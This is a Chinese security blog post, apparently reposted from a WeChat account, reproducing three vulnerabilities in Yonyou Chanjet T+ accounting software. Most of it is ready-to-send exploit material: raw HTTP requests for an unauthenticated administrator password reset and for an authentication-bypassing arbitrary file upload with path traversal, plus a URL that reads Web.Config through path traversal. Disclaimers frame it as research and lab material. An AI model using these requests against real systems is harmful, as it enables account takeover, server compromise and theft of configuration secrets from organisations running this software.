用友 畅捷通T+ 漏洞复现

admin
admin
admin
137432
文章
113
评论
2022年10月28日23:00:51评论1,352 views1字数 2250阅读7分30秒阅读模式
用友 畅捷通T+ 漏洞复现
    文章声明

安全技术类文章仅供参考,此文所提供的信息仅针对漏洞靶场进行渗透,未经授权请勿利用文章中的技术手段对任何计算机系统进行入侵操作。
本文所提供的工具仅用于学习,禁止用于其他目的,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全

用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞

一、漏洞描述

用友 畅捷通T+ RecoverPassword.aspx 存在未授权管理员密码修改漏洞,攻击者可以通过该漏洞修改管理员账号密码登录后台

二、漏洞影响

用友 畅捷通

三、漏洞复现

访问首页显示如下

用友 畅捷通T+ 漏洞复现

访问下列地址查看是否存在漏洞

http://xx.xx.xx.xx/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx

用友 畅捷通T+ 漏洞复现

可以看到重置密码仅需pwdNew参数

漏洞利用poc如下

POST /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd  HTTP/1.1Host: xx.xx.xx.xxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: ASP.NET_SessionId=gp3mxvri3leqbqazlatfx5jgContent-Length: 49
{"pwdNew":"46f94c8de14fb36680850768ff1b7f2a"}

用友 畅捷通T+ 漏洞复现

重置后的系统管理员账号密码为 admin/123qwe

用友 畅捷通T+ 漏洞复现

用友 畅捷通T+ Upload.aspx 任意文件上传漏洞

一、漏洞描述

用友 畅捷通T+ Upload.aspx接口存在任意文件上传漏洞,攻击者通过 preload 参数绕过身份验证并进行文件上传,达到获取服务器权限的目的  

二、漏洞影响

用友 畅捷通T+ <= 17.x

三、漏洞复现

首先访问下列地址查看判断漏洞是否存在

http://xx.xx.xx.xx/tplus/SM/SetupAccount/Upload.aspx?preload=1

用友 畅捷通T+ 漏洞复现

漏洞利用poc如下

POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1Host: xx.xx.xx.xxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36Content-Length: 188Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cache-Control: max-age=0Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundarysHT4cEvOAWALSZEvOrigin: nullUpgrade-Insecure-Requests: 1
------WebKitFormBoundarysHT4cEvOAWALSZEvContent-Disposition: form-data; name="File1"; filename="../aaaa.txt"Content-Type: image/jpeg
aaaa------WebKitFormBoundarysHT4cEvOAWALSZEv--

用友 畅捷通T+ 漏洞复现

直接访问写入的文件

http://xx.xx.xx.xx/tplus/SM/SetupAccount/aaaa.txt

用友 畅捷通T+ 漏洞复现


用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

一、漏洞简介

用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件  

二、漏洞影响

用友 畅捷通  

三、漏洞复

存在漏洞的地址

/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config

用友 畅捷通T+ 漏洞复现

原文始发于微信公众号(守卫者安全):用友 畅捷通T+ 漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月28日23:00:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友 畅捷通T+ 漏洞复现https://cn-sec.com/archives/1377207.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息